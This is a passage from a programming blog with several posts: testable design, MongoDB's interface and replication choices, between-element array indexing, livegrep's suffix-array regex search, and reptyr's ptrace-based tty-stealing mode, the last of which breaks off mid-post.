Made of Bugs

Design for Testability

When designing a new software project, one is often faced with a glut of choices about how to structure it. What should the core abstractions be? How should they interact with each other?

In this post, I want to argue for a design heuristic that I've found to be a useful guide to answering or influencing many of these questions:

Optimize your code for testability

Specifically, this means that when you write new code, as you design it and design its relationships with the rest of the system, ask yourself this question: "How will I test this code? How will I write automated tests that verify the correctness of this code, with minimal irrelevant assumptions about the environment or the rest of the system?" And if you don't have a good answer to that question, redesign your abstractions or interfaces until you do.

I've found this heuristic valuable in two different ways, and I'll discuss both here.

You get good tests

This one is, perhaps, obvious: If you set out with a goal of having good tests, you will likely end up with good tests.

However, I think it's worth saying a bit more about it.

First, I want to emphasize how wonderful it is to work in a code base with good tests. The process of verifying changes is simple: just run the tests. No need to set up complicated development environments and poke at the system manually or interactively; just make test, and get, if not a guarantee, high confidence that your code does what you think it does and hasn't broken anything important.

In large and mature software systems, the hardest part of making changes is not the change itself, but making the change in a way that doesn't regress any other important behavior. Good, fast, tests that can provide basic assurances quickly are therefore an enormous productivity improvement.

Second, in order to really realize the benefits of good tests, you need to be able to run tests – or, at a minimum, the subset of tests covering your changes – quickly, in order to keep a fast development cycle.

In order to preserve this property as a system scales, you need to have good unit tests. There are a lot of religious arguments out there about the boundaries between "unit", "functional", "integration", and other sorts of tests; By "unit" tests here I mean tests that exercise some specific module or component of the code base with minimal dependencies on or invocation of other code in the application.

You will always also need some number of integration tests, which exercise the application end-to-end, in order to shake out the inevitable subtle interactions between components. But relying primarily on unit tests brings significant advantages:

  • Unit tests are fast: By exercising a limited amount of code, they run more quickly than tests that must invoke the entire application.
  • More importantly, unit tests scale: In a codebase with mostly unit tests, test speed should scale linearly with application size. With more functional end-to-end tests, you risk scaling closer to quadratically, as each component requires tests that in turn incidentally exercise nearly every other component.
  • Because unit tests are associated with clear pieces of code, it's easy to run only the tests corresponding to a specific change, providing an even faster feedback loop to development.

Good unit tests don't happen by accident, however. It's very hard to have good unit tests without having good "units": Portions of code with narrow and well-defined interfaces, which can be tested at those interfaces.

The best way to have such logical units, which then permit excellent tests, which in turn permit rapid feedback cycles while maintaining a mature project, is just to do so directly: Write code with this end in mind.

You get better code

The second reason to write code with the tests in mind is that you actually end up with better code!

Let's consider some of the characteristics that easy-to-test code should have:

A preference for pure functions over immutable data

Pure functions over immutable data structures are delightfully easy to test: You can just create a table of (example input, expected output) pairs. They're generally also easy to fuzz with tools like QuickCheck, since the input is easy to describe.
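
For example, a table-driven test for a small pure function might look something like this (slugify here is just an illustrative stand-in, not from any particular codebase):

import unittest

def slugify(title):
    # A pure function over an immutable input: same input, same output, no IO.
    return "-".join(title.lower().split())

class TestSlugify(unittest.TestCase):
    CASES = [
        ("Hello World", "hello-world"),
        ("  Design   for   Testability ", "design-for-testability"),
        ("", ""),
    ]

    def test_table(self):
        for given, expected in self.CASES:
            self.assertEqual(slugify(given), expected)

if __name__ == "__main__":
    unittest.main()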

Small modules with well-defined interfaces

If a chunk of code has a small, well-defined interface, we can write black-box tests in terms of that interface, which test the described interface contracts, without caring excessively about either the internals of the module, or about the rest of our system.

A separation of IO and computation

IO is, in general, harder to test than pure code. Testable systems therefore isolate it from the pure logic of the code, to allow them to be tested separately.

Explicit declaration of dependencies

Code that implicitly plucks a database name out of the global environment is much harder to test than code that accepts a handle as an argument – you can call the latter with different handles over the course of your test, to test against a clean database each time, to test in multiple threads at once, or whatever else you need.

In general, testable code accepts dependencies as explicit arguments at some point, instead of assuming their implicit availability.
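
As a minimal sketch (the names here are illustrative, not from any real codebase): because count_users takes its handle as an argument instead of reading it from a global, a test can hand it a scratch connection or a trivial fake:

def count_users(db):
    # The handle is an explicit argument, so the test controls exactly what it talks to.
    return db.query("SELECT count(*) FROM users")

class FakeDB:
    """A stand-in that answers the one query this test cares about."""
    def query(self, sql):
        assert "FROM users" in sql
        return 3

def test_count_users():
    assert count_users(FakeDB()) == 3

test_count_users()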

If I look at these characteristics, I find that they're also the characteristics of good, well-structured code in general! By architecting a system with testing in mind, we generally get a better-factored system than we would have, otherwise.

Furthermore, by approaching these properties indirectly – through the lens of testing – we make them more concrete. It's easy to debate indefinitely what the right modules, interfaces and structures are for a software system; But faced with the concrete frame of "What makes it easy to adequately test this code?", it's easier to evaluate our choices and to decide when we've gone far enough.


There are few things more important for a complex software system than the ability to make changes with confidence, and high-quality automated tests are one of the most important tools we have to this end. Good tests don't happen by accident, or even by brute-force effort: they happen by design, because the application was written to enable them.

As you write software, always be asking yourself "How will I test this software's correctness?" and be willing to design to that goal. In return, you'll get a system you can be – and stay – much more confident of, and one that's better-structured otherwise.

What MongoDB Got Right

MongoDB is perhaps the most-widely-mocked piece of software out there right now.

While some of the mockery is out-of-date or rooted in misunderstandings, much of it is well-deserved, and it's difficult to disagree that much of MongoDB's engineering is incredibly simplistic, inefficient, and immature compared to more-established databases like PostgreSQL or MySQL.

You can argue, and I would largely agree, that this is actually part of MongoDB's brilliant marketing strategy, of sacrificing engineering quality in order to get to market faster and build a hype machine, with the idea that the engineering will follow later.

In this post, however, I want to focus on something different: I want to explore some design decisions that I believe MongoDB got right, especially compared to SQL databases, its main competitors1.

Implementations evolve and improve with time, but interfaces last nearly forever. In each of the cases I explore, I contend that MongoDB legitimately out-innovated SQL databases, potentially positioning it – in a few years, once the implementation matures – as a superior database for a wide range of use cases.

This post is not an exhaustive enumeration: In the interests of space, I've chosen a few areas to focus on, in which I think MongoDB has really hit on some good ideas. There are a lot of other differences between MongoDB and a SQL RDBMS; This post shouldn't be construed as either a defense of or a criticism of any individual feature or design choice not listed here.

Structured Operation Format

Let's start with the simplest one. Making the developer interface to the database a structured format instead of a textual query language was a clear win.

SQL is a great language for ad-hoc exploration of data or for building aggregates over data sets. It's an absolutely miserable language for programmatically accessing data.

Querying SQL data involves constructing strings, and then – if you want to avoid SQL injection – successfully lining up placeholders between your pile of strings and your programming language. If you want to insert data, you'll probably end up constructing the string (?,?,?,?,?,?,?,?) and counting arguments very carefully.

The situation is sufficiently untenable that it's rare to write apps without making use of an ORM or some similar library, creating additional cognitive overhead to using a SQL database, and creating painful impedance mismatches.

By using a structured (BSON) interface, MongoDB makes the experience of programmatically interacting with the database much simpler and less error-prone2. In a world where databases are more frequently used as backend implementation details owned by an application – and thus accessed entirely programmatically – this is a clear win.
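
For instance, with the standard Python driver (a sketch assuming pymongo and a local MongoDB; the database and field names are made up), the query is just an ordinary dictionary – there are no strings to escape and no placeholders to count:

from pymongo import MongoClient

users = MongoClient()["app"]["users"]
users.insert_one({"name": "ada", "signup_year": 2015, "roles": ["admin"]})

# Structured query: a nested dict, built programmatically like any other data.
for doc in users.find({"signup_year": {"$gte": 2014}, "roles": "admin"}):
    print(doc["name"])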

BSON probably wasn't the best choice, and MongoDB's implementation isn't perfect. But it's a fundamentally better approach for how we use databases today than SQL is.

Replica Sets

Now we'll turn to the more operational side of MongoDB. MongoDB, out of the box, includes support for "replica sets", MongoDB's replication+failover solution. A MongoDB Replica Set consists of a "primary", which services all writes, and a group of "secondaries", which asynchronously replicate from the primary. In the event of a failure of the primary, a Raft-like consensus algorithm automatically elects and promotes a new primary node.

Nearly anyone who uses SQL databases in production ends up configuring read replicas, in order to distribute read load, and provide a hot spare in the event of the loss of the primary. However, with both MySQL and PostgreSQL, configuring replication remains complex and error-prone, both in terms of the breadth of options available, and in the set-up and management of read replicas. I challenge anyone unfamiliar with the respective systems to read mysql or postgres's replication documentation and efficiently determine the correct setup for a simple read slave.

And automated failover is even more fraught in the SQL world; Github famously disabled their automated failover after their solution caused more outages than it resolved. Even once you have a failover solution – and everyone's looks slightly different – client libraries are often not built with failover in mind, requiring applications to manually detect failure and trigger reconnects.

MongoDB's replica sets are not without their warts, but the conceptual model is fundamentally strong, and allows operators to, with minimal fussing, configure read replicas, manually or automatically fail over to a new server, add or remove replicas, and monitor replication health, via simple, standard interfaces, all with minimal or no downtime, and almost entirely using in-band administrative commands (no editing of configuration files or command-line options).

Baking replication, membership, and failover into the core also means that drivers can be aware of it at a much higher level. The standard MongoDB client drivers are aware of replica set membership, and automatically discover the primary and reconnect as failovers happen and the primary moves around or nodes come and go. Awareness of secondaries also allows application developers to select desired consistency and durability guarantees ("read preference" and "write concern" in Mongo jargon) on a per-operation level.
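
A sketch of what that looks like from the Python driver (host and collection names here are illustrative): the client is pointed at the replica set as a whole, and consistency and durability are chosen per operation:

from pymongo import MongoClient, ReadPreference
from pymongo.write_concern import WriteConcern

client = MongoClient("mongodb://db1,db2,db3/?replicaSet=rs0")
events = client["app"]["events"]

# Durable write: block until a majority of the replica set has acknowledged it.
events.with_options(write_concern=WriteConcern(w="majority")).insert_one({"kind": "signup"})

# Cheap, possibly slightly stale read: let a secondary answer if one is available.
stale_ok = events.with_options(read_preference=ReadPreference.SECONDARY_PREFERRED)
print(stale_ok.count_documents({"kind": "signup"}))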

In a world where we increasingly take for granted the devops mantra of "cattle, not pets", and where databases are often the quintessential "pet" (special, singleton, servers requiring lots of careful manual attention), the MongoDB replica set model moves us strongly towards a world where a database is a cluster of mostly-indistinguishable machines that can be individually swapped out at will, and the system will adapt appropriately.

The Oplog

MongoDB's oplog is the data structure behind MongoDB's replication. Similar in concept to MySQL's row-based replication, it logs every modification made to the database, at the level of individual documents. By following this log and replaying the writes, secondaries in a replica set are able to efficiently follow the primary and stay up-to-date.

At a technical level, the oplog is not particularly novel or innovative. In terms of how it fits into the overall system, however, the design is compelling in a number of ways.

The oplog is exposed directly as a collection (local.oplog.rs) in MongoDB, and can be accessed just like any other collection. This design choice simplifies interacting with the oplog in a number of ways: the same APIs can be used in client bindings, the standard authentication and authorization mechanisms work, and the same data format (BSON objects) is used, making entries easy for users to interpret.

In addition, the oplog uses GTID-like position identifiers that are identical across all nodes in a replica set. This allows clients to seamlessly follow writes across the replica set as a logical unit, without thinking too hard about the physical topology or which nodes are primary.

Rather than define a new serialization format for changes, the oplog reuses BSON, like everything else in MongoDB. In addition, the structure of oplog entries is quite simple – there are only five or so types of operations. The conjunction of these two features makes it easy to parse and interpret oplog entries.

The combination of all these features means that it's feasible – even easy – to use the oplog not just as an internal implementation detail, but as an application-visible log of all database writes, which can be used to drive external systems, such as data analysis pipelines or backup systems.

My own MoSQL, for instance, replicates from MongoDB (via the oplog) into PostgreSQL, in under 1000 lines of Ruby. Meteor, a platform for realtime javascript applications, leverages the oplog to get realtime notification of changes to the database without having to poll for changes.
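
Tailing the oplog yourself takes only a few lines. Here's a rough sketch using pymongo (error handling and resume logic are elided; ts, op, ns, and o are fields of the oplog entry format):

import time
import pymongo

client = pymongo.MongoClient()
oplog = client["local"]["oplog.rs"]

# Start from the most recent entry, then follow new writes as they happen.
last = next(oplog.find().sort("$natural", -1).limit(1))["ts"]
while True:
    cursor = oplog.find({"ts": {"$gt": last}},
                        cursor_type=pymongo.CursorType.TAILABLE_AWAIT)
    for entry in cursor:
        last = entry["ts"]
        print(entry["op"], entry.get("ns"), entry.get("o"))
    time.sleep(1)   # the cursor died (e.g. nothing left to read); re-establish it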


This post is not a holistic defense of MongoDB as it exists today. MongoDB remains immature, and today's SQL databases remain some of the most mature, battle-tested, reliable, and performant storage solutions ever created. And MongoDB made many novel design decisions other than the ones I've cited above; some are good ideas, some are bad ideas, and some remain to be determined.

However, I do believe that, in significant ways, MongoDB is much better designed for the ways we write and run applications in 2015 than the SQL RDBMS paradigm.

Put that way, of course, this realization shouldn't be surprising: SQL databases – while incredible pieces of technology – haven't really fundamentally changed in decades. We should probably expect a database designed and written today to be a better fit for modern application and operational paradigms, in at least some ways.

The interesting question, then, is whether the rest of the engineering behind MongoDB can catch up. I, for one, am optimistic. MongoDB continues to improve rapidly: It's adopted a real storage engine, and Facebook is working on another. MongoDB 3.2, now in RC, significantly improves leader elections. Every day, more experienced engineers turn their eyes on MongoDB, and while they often do discover problems, those problems then tend to get fixed fairly efficiently.

So while MongoDB today may not be a great database, I think there's a good chance that the MongoDB of 5 or 10 years from now truly will be.

  1. Despite all the "NoSQL" hype, MongoDB is structurally and functionally much more similar to a SQL database than it is to most of the more exotic NoSQL databases. In both MongoDB and SQL RDBMSes, the core abstraction is a single server, with a number of tables or collections that support multiple consistent secondary indexes and rich querying. 

  2. MongoDB did mess up slightly and allow a literal/operator ambiguity that permits a form of injection attack, but it's more limited and rarer than SQL injection. 

Indices Point Between Elements

If you're familiar with nearly any mainstream programming language, and I asked you to draw a diagram of an array, the array indices, and the array elements, odds are good you'd produce a diagram something like this:

In this post, I want to persuade you to replace that image, or, at least, to augment it with an alternate view on the world.

I want to argue that, rather than numbering elements of an array, it makes just as much sense, and in many cases more, to number the spaces between elements:

With this representation, we do have to relearn how to refer to indexing: We refer to A[i] no longer as "The element at index i", but rather "The element to the right of index i".

Representing Ranges

I'll run through a few reasons why I prefer this representation, but most of them boil down to representing ranges of elements.

Suppose we have an array, and we want a way to refer to a certain subset of it, like so:

One obvious answer is with a start and a length: start=2 length=3, but it's often convenient to represent a range as a pair of (start, end) indices. The latter representation, for example, lets you check if an index falls into the range directly.

If we number elements, it's not immediately apparent which index to use for end:

Both (1, 3) and (1, 4) seem initially defensible. But if we number between elements, there's a clear, unique answer:

The indices we want are the ones that lie between the included and excluded elements: (1, 4).

With this model, the rules of range manipulation and comparison become straightforward:

  • Two ranges are adjacent if left.end == right.start

  • One range is a subset of another if inner.start >= outer.start && inner.end <= outer.end

  • A range contains end - start elements:

In order to answer the question "if I dereference an index, is the result contained in the range?", we need to remember that A[i] is now defined as the element after index i. With that in mind, it becomes easy to see that for a range (start, end), elements indexed by start <= i < end are within the range.
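
Those rules translate directly into code. A small sketch, representing a range as a (start, end) pair of between-element indices:

def adjacent(left, right):
    return left[1] == right[0]          # the ranges meet at exactly one gap

def contains(outer, inner):
    return outer[0] <= inner[0] and inner[1] <= outer[1]

def length(r):
    return r[1] - r[0]

def index_in_range(r, i):
    # A[i] is the element to the *right* of gap i, so it lies inside the range
    # exactly when start <= i < end.
    return r[0] <= i < r[1]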

Off-by-one errors

Indexing between elements, instead of indexing elements, helps avoid a large class of off-by-one errors. I'll run through a number of examples using Python, but the fundamental issues apply to array APIs in many more languages, or to any time you're manipulating an array-like data structure via any of these operations.

Inserting elements

If you want to insert an element into an array, how do you specify the location? If you name an existing element, does the new element go before or after that element?

Python's standard library documentation somewhat awkwardly specifies that "The first argument is the index of the element before which to insert," clarifying that this means insert(0, X) inserts X at the start of the array.

But if we number gaps between elements, instead of numbering elements, the story is perfectly clear: 0 names the gap before the first element, and so of course inserting at 0 should prepend an element. Similarly, 1 names the gap between the first and second elements, and so on.
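
For example, in Python:

>>> a = [1, 2, 3]
>>> a.insert(0, 99)    # gap 0: before the first element
>>> a
[99, 1, 2, 3]
>>> a.insert(2, 42)    # gap 2: between the second and third elements
>>> a
[99, 1, 42, 2, 3]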

Slicing arrays

How do we refer to a partial subset of an array that we want to extract? Python, like many other languages, lets you use a pair of indexes:

>>> [1,2,3,4][1:3]
[2, 3]

The documentation, however, has to resolve the same ambiguity noted above: Is the final index excluded or included? Ruby even helpfully offers you both choices:

irb(main)> [1,2,3,4][1...3]
=> [2, 3]
irb(main)> [1,2,3,4][1..3]
=> [2, 3, 4]

As discussed earlier, if we adjust our view of indexes, there is no ambiguity at all. Conveniently, this also gives us the same semantics as Python and most other languages: there are good reasons half-inclusive ranges are generally preferable, and most languages converge on this choice.

Removing elements

If we want to remove a single element from an array, it does seem simpler to index elements directly – we can just directly name the index we want to eliminate.

However, if we want to adopt the more general primitive of removing slices (Python's del array[x:y]), we run into the same problem as we did when extracting slices. Once again, shifting our thinking to index between elements removes all ambiguity.
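
Again in Python:

>>> a = [1, 2, 3, 4, 5]
>>> del a[1:3]    # remove everything between gaps 1 and 3
>>> a
[1, 4, 5]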

Incrementally consuming an array

Suppose we're walking through an array, consuming it by elements or groups of elements at a time. Perhaps we're parsing a string, consuming tokens as we go.

How do we keep track of our current position? Should we keep the index of the last element we've processed, or of the first element we have yet to process?

If we shift our perspective, this problem too vanishes: We can store the index between the last item consumed, and the next one to be consumed. Our index neatly partitions the buffer into "processed" and "to-be-processed", with no ambiguity at all.
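
A small sketch of that pattern – a whitespace tokenizer whose only state is a single between-element index:

def tokens(s):
    pos, out = 0, []               # pos: the gap between consumed and unconsumed input
    while pos < len(s):
        if s[pos].isspace():
            pos += 1               # consume one separator
            continue
        end = pos
        while end < len(s) and not s[end].isspace():
            end += 1
        out.append(s[pos:end])     # the token sitting between gaps pos and end
        pos = end                  # everything left of pos is now processed
    return out

assert tokens("consume these tokens") == ["consume", "these", "tokens"]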

C/C++ Pointers and Iterators

With pointers in C, or with iterators in C++ (which were essentially designed to mimic C's pointer semantics), we speak of pointers into an array or of iterators as referring to a specific element in memory.

However, both systems allow for this additional "valid" iterator or pointer, which points "just past the end" of a container. This pointer/iterator does not name a valid element, but is a valid pointer or iterator. The C specification is full of awkward verbiage to address this special-case:

both [pointers] shall point to elements of the same array object, or one past the last element of the array object;

(N1256 §6.5.6p9). And with a C++ std::vector, v.begin() and v.end() are both valid iterators, but v.end() points "one past the end" and cannot be dereferenced.

These apparently odd inconsistencies and special cases vanish if you shift your thinking slightly in just the way I've been arguing: Instead of thinking of iterators as referring to individual elements, we hold that they name the interstitial points between elements.

If we do so, the "one-past-the-end" iterator is no longer "past" the end – it points directly at the end, which is no more fundamentally special than the "start" iterator which points directly at the beginning.

It's still the case that we cannot dereference v.end(), but that behavior is a function of the "dereference" operation, which selects the element after an iterator. The iterators themselves are no longer special cases.

Postscript: 0 or 1?

It used to be popular, and still is in some circles, to debate whether programming languages ought to start array indexing at 0 or 1. And there are still a few holdouts, like Matlab, which number their arrays starting from 1, causing no end of pain and confusion to those poor souls who have to switch between them and more mainstream languages.

Once I started thinking of pointers or iterators or indexes as indexing between elements, one of the more mind-bending realizations that followed was that this model can harmonize the "index from 0" and "index from 1" camps!

Let's consider an array with interstices labeled again:

The first element, A[0] in C or Python, is bracketed by indexes 0 and 1. The decision, then, to name it 1 does not involve changing the picture at all; If you draw indices between elements, the statement "Arrays start at 1" is simply a decision that "The dereference operator refers to the element to the left of an index," in exactly the same way that I described dereference in a 0-indexed language as taking the element to the right. And presented that way – "should dereference take the left or the right element?" – it becomes clear that 0 or 1 really is an arbitrary choice.


I credit my personal shift in thinking – from labeling elements to labeling interstices – to my reading of the excellent The Craft Of Text Editing, which introduces the concept both for its notion of a mark, and specifically as an implementation idea while talking about buffer representations.

I recommend giving the book a read even if you never aspire personally to implement an Emacs; It's filled with a great number of interesting ideas, and possessed of a profound clarity of thought throughout.

Regular Expression Search With Suffix Arrays

Back in January of 2012, Russ Cox posted an excellent blog post detailing how Google Code Search had worked, using a trigram index.

By that point, I'd already implemented early versions of my own livegrep source-code search engine, using a different indexing approach that I developed independently, with input from a few friends. This post is my long-overdue writeup of how it works.

Suffix Arrays

A suffix array is a data structure used for full-text search and other applications, primarily these days in the field of bioinformatics.

A suffix array is pretty simple, conceptually: It's a sorted array of all of the suffixes of a string. So, given the string "hither and thither", we could construct a suffix array like so:

hither and thither
Index Suffix
6  and thither
10  thither
7 and thither
9 d thither
16 er
4 er and thither
15 her
3 her and thither
12 hither
0 hither and thither
13 ither
1 ither and thither
8 nd thither
17 r
5 r and thither
14 ther
2 ther and thither
11 thither

Note that there is no need for each element of the array to store the entire suffix: We can just store the indexes (the left-hand column), along with the original string, and look up the suffixes as needed. So the above array would be stored just as

[6 10 7 9 16 4 15 3 12 0 13 1 8 17 5 14 2 11]

There exist algorithms to construct suffix arrays efficiently (in O(n) time) and in-place (using constant additional memory outside of the array itself).

Full-text substring search

Once we have a suffix array, one basic application is full-text search.

If we're trying to find a substring within a larger corpus, we know that that substring, if present, must be a prefix of some suffix of the larger corpus. That is, given a suffix array, any substring present in the corpus must be the start of some entry in the suffix array. For example, searching for "her" in "hither and thither", we find that it is present in two places in the string, and it begins two lines of the above suffix array:

15 her
3 her and thither

But because the suffix array is sorted, we can find those entries efficiently by binary searching in the suffix array. The indexes then give us the location of the search string in the larger text.
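
To make that concrete, here's a toy Python version – a naive O(n² log n) construction and a pair of binary searches, nothing like livegrep's actual implementation:

def build_suffix_array(text):
    # Naive construction: sort the suffix start positions by the suffix they begin.
    return sorted(range(len(text)), key=lambda i: text[i:])

def find_substring(text, sa, query):
    # Binary-search for the block of suffixes that start with `query`,
    # and return the corresponding positions in the original text.
    def prefix(i):
        return text[sa[i]:sa[i] + len(query)]
    lo, hi = 0, len(sa)
    while lo < hi:                      # lower bound: first suffix with prefix >= query
        mid = (lo + hi) // 2
        if prefix(mid) < query:
            lo = mid + 1
        else:
            hi = mid
    start, hi = lo, len(sa)
    while lo < hi:                      # upper bound: first suffix with prefix > query
        mid = (lo + hi) // 2
        if prefix(mid) <= query:
            lo = mid + 1
        else:
            hi = mid
    return [sa[i] for i in range(start, lo)]

text = "hither and thither"
sa = build_suffix_array(text)
print(find_substring(text, sa, "her"))   # [15, 3]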

Towards Regular Expression Search

We begin with a large corpus of source code we want to do regular expression search over.

During indexing, livegrep reads all of the source files and flattens them together into a single enormous buffer (livegrep uses the open-source libdivsufsort library to build the suffix array; old versions of livegrep used a hand-rolled radix sort, which often went quadratic – divsufsort dramatically improved index-building performance). As it does this, it maintains information I call the "file content map", which is essentially just a sorted table of (start index, end index, file information), which allows us to determine which input file provided which bytes of the buffer.

(This is something of a simplification; livegrep actually uses a number of suffix arrays, instead of a single giant one, and we compress the input by deduplicating identical lines, which makes the file content map more complicated. A future blog post may discuss the specifics in more detail)

But now how do we use that structure to efficiently match regular expressions?

As a first idea, we can find literal substrings of the regular expression, find any occurrences of those strings using the suffix array, and then only search those locations in the corpus.

For example, given /hello.*world/, we can easily see that any matches must contain the string "hello", and so we could look up "hello", find all lines containing it, and then check each line against the full regular expression.

More complex searching

But it turns out we can do better. Because of the structure of the suffix array, we can perform at least two basic queries beyond substring search:

  • Range search: We can efficiently find all instances of a character range, by binary-searching each end. If we have the range [A-F], we binary-search for the first suffix starting with A, and the last suffix starting with F, and we know that every index in between (in the suffix array) starts with something between A and F.

  • Chained searches: If we have a chunk of the suffix array that we know has a common prefix, we can narrow down the search by doing additional searches and looking at the next character, within that range. For example, if we want to find /hi(s|m)/, we can binary-search to find all positions starting with hi, which gives us a contiguous block of the suffix array. But since that block is sorted, we can do another pair of binary searches within that range, looking only at the third character, one looking for s and one for m, which will give us two smaller chunks, one for "his" and one for "him".

We also have the option of making multiple searches and combining the results; Given /hello|world/, we can search for "hello", and search for "world", and then look at both locations.

And we can combine all of these strategies. By way of example, we can search for /[a-f][0-9]/ by:

  1. Binary searching to find a-f
  2. Splitting that into 6 ranges, one for a, b, c, d, e, and f
  3. For each of those ranges, doing a binary search over the second character, looking for the 0-9 range.

When we're done, each of the resulting ranges in the suffix array then contains only locations matching /[a-f][0-9]/.
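
Building on the toy suffix array from earlier, here's a rough sketch of that procedure (the helper name refine is mine; this is nothing like livegrep's real code):

def refine(text, sa, lo, hi, depth, min_ch, max_ch):
    # Given that the suffixes in sa[lo:hi] share a common prefix of length `depth`,
    # narrow to those whose character at position `depth` lies in [min_ch, max_ch].
    def ch(i):
        pos = sa[i] + depth
        return text[pos] if pos < len(text) else ""   # "" sorts before every character
    a, b = lo, hi
    while a < b:                                      # first suffix with ch >= min_ch
        m = (a + b) // 2
        if ch(m) < min_ch:
            a = m + 1
        else:
            b = m
    start, b = a, hi
    while a < b:                                      # first suffix with ch > max_ch
        m = (a + b) // 2
        if ch(m) <= max_ch:
            a = m + 1
        else:
            b = m
    return start, a

# /[a-f][0-9]/: one range search, then a per-character split and a second search.
lo, hi = refine(text, sa, 0, len(sa), 0, "a", "f")
positions = []
for c in "abcdef":
    c_lo, c_hi = refine(text, sa, lo, hi, 0, c, c)
    d_lo, d_hi = refine(text, sa, c_lo, c_hi, 1, "0", "9")
    positions.extend(sa[d_lo:d_hi])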

Essentially, this means we can answer queries using index lookup keys of the form (borrowing Go syntax):

type IndexKey struct {
  edges []struct {
    min  byte
    max  byte
    next *IndexKey
  }
}

(livegrep's definition is similar at the core, with some additional bookkeeping that's used while analyzing the regex)

For each edge in a query, we do a search to find all suffixes starting in that range, then split that range into individual characters, and recurse, evaluating next and looking one character deeper into the suffix.

Given a regular expression, livegrep analyzes it to extract an IndexKey that should have the property that any matches of the regular expression must be matched by that IndexKey, and that is as selective as possible.

For many cases, this is simple — a character class gets translated directly into a series of ranges, a literal string is a linear chain of IndexKeys with one-character ranges, and so on. For repetition operators and alternations (|), things get more complicated. I hope to write more about this in a future blog post, but for now you can read the source if you're curious, or play with analyze-re, which has a dot output mode showing the results of livegrep's analysis.

Using the Results

Walking the suffix array as above produces a (potentially large) number of positions in the input corpus, which we want to search. Rather than searching each individually, livegrep takes all of the matches and sorts them in memory. We then walk the list in order, and if several matches are close together, run a single regex match over the entire range at once.

Livegrep uses Russ Cox's own RE2 library to match regular expressions. In addition to being quite fast, RE2, unlike PCRE or most other regex libraries, actually compiles regexes into finite-state automata, providing guaranteed-linear matching performance.

Grouping matches together lets us take advantage of RE2's speed to churn through big chunks of text at once, instead of micromanaging the calls and doing excessive bookkeeping ourselves.

In order to decide exactly how far to search around a potential match, we use the fact that livegrep searches on lines of source code: We can use a simple memchr to find the preceding and following newline, and just search precisely the line of code containing the possible match.
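
A rough sketch of that post-processing, with Python's re module standing in for RE2 and str.rfind/str.find standing in for memchr:

import re

def matches_on_lines(text, positions, pattern):
    rx = re.compile(pattern)
    results, searched_to = [], -1
    for pos in sorted(positions):
        if pos < searched_to:
            continue                              # this line was already scanned
        start = text.rfind("\n", 0, pos) + 1      # preceding newline (or start of buffer)
        end = text.find("\n", pos)
        end = len(text) if end == -1 else end     # following newline (or end of buffer)
        searched_to = end
        m = rx.search(text, start, end)
        if m:
            results.append((start, text[start:end]))
    return results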

Once we've run RE2 over all of the match positions, we have a list of matches in the corpus. For each match, we use the file content table mentioned earlier to identify the file that contained those bytes, and return the match. In order to identify the line number, we just pull the entire file contents out, and count newlines directly.

If, however, we've also been given a file reference to constrain the search (e.g. file:foo\.c), we walk the file-contents map in parallel with the list of results from the index walk, and discard positions outright unless the file containing them matches the file regular expression.

The interesting feature of this approach is that applying a filename restriction doesn't actually limit the search space that much — livegrep still walks the entire suffix array, and still considers each resulting match (although it can do a faster check against the content map, instead of calling into RE2). However, livegrep is fast enough that it doesn't need to take advantage of this restriction to return results quickly — and in fact it needs to be, in order to handle queries with no file restriction.

This does mean that some of the slowest queries you can make against livegrep are ones that limit the path heavily, but don't provide good usage of the suffix array: . file:zzzz is close to the slowest query you can make against livegrep today.


That's the basic picture. Next time, I'll discuss in more detail how we construct index queries and transform regular expressions into an index query, and then finally I'll talk about how the suffix array and file-contents data structures actually work in livegrep, versus the simplified version presented here. Notably, livegrep actually compresses the input significantly, which reduces the memory needed and speeds up the searches, at the cost of additional complexity building the index and interpreting results.

New Reptyr Feature: TTY-stealing

Ever since I wrote reptyr, I've been frustrated by a number of issues in reptyr that I fundamentally didn't know how to solve within the reptyr model. Most annoyingly, reptyr fundamentally only worked on single processes, and could not attach processes with children, making it useless in a large class of real-world situations.

TTY stealing

Recently, I merged an experimental reptyr feature that I call "tty-stealing", which has the potential to fix all of these issues (with some other disadvantages, which I'll discuss later).

To try it out, clone and build reptyr from git master, and attach a process using reptyr -T PID.

Unlike in the default mode, reptyr -T will attach the entire terminal session of PID, not just the single process. For instance, if you attach a less process and then hit q, you'll find yourself sitting at the same shell that launched less, not the shell you launched reptyr from. Exit that shell, and you'll be back at your original session.

One unfortunate known issue: reptyr -T cannot attach sessions that were started directly from an ssh session unless it is run as root. Read on to learn why.

How it works

In its default mode of operation, reptyr attaches (via ptrace(2)) directly to the target process, and actually swaps out the terminal file descriptors to point at a new terminal. This mode of operation explains (mostly) why we can't attach process trees: We would need to attach to every process individually, and coordinate the switchover (there are actually even deeper reasons related to the tty handling, but that's the basic story).

reptyr -T tackles the problem from the other end. When you're running a terminal session on a modern machine, the terminal device that your shell and commands run on is a "pseudo-terminal", a virtual terminal device that acts essentially like a two-way pipe, with a bunch of extra input-handling behavior. When your bash writes to stdout, that data flows over the pty, and is read by the terminal emulator (which might be gnome-terminal, or might be tmux, or might be ssh), which then displays it to you in some way.

Instead of switching out terminals in the target process, reptyr -T goes after the other end of the pty, the so-called "master". reptyr -T attempts to discover the pid of the terminal emulator, attaches to it via ptrace(2), and finds the fd corresponding to the master end of the target pty. It then opens a UNIX socket, and uses SCM_RIGHTS to send the file descriptor back to the reptyr process. reptyr closes the master fd in the original terminal emulator (opening /dev/null over it, to minimize disruption), and detaches from the master.
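
reptyr itself is written in C, but the fd-passing step is easy to illustrate in Python: given any connected UNIX-domain socket pair, one process can hand an open file descriptor to the other via an SCM_RIGHTS ancillary message (a sketch, with no error handling):

import array
import socket

def send_fd(sock, fd):
    # Ship one open file descriptor as SCM_RIGHTS ancillary data.
    sock.sendmsg([b"\0"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS,
                            array.array("i", [fd]))])

def recv_fd(sock):
    fds = array.array("i")
    msg, ancdata, flags, addr = sock.recvmsg(1, socket.CMSG_LEN(fds.itemsize))
    for level, kind, data in ancdata:
        if level == socket.SOL_SOCKET and kind == socket.SCM_RIGHTS:
            fds.frombytes(data[:fds.itemsize])
    return fds[0]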

reptyr then takes over the role of terminal emulator, reading from the master fd and copying output to its own terminal, and copying input from its terminal back to the master fd. This has the net effect that you appear to be connected directly to the target session.

Because this process does not touch the terminal session at all, it is entirely transparent to the process(es) being attached, and works in a large number of circumstances where vanilla reptyr would glitch.


Unfortunately, the new mode isn't quite flawless. ptraceing the terminal emulator instead of the target process brings a few new problems.

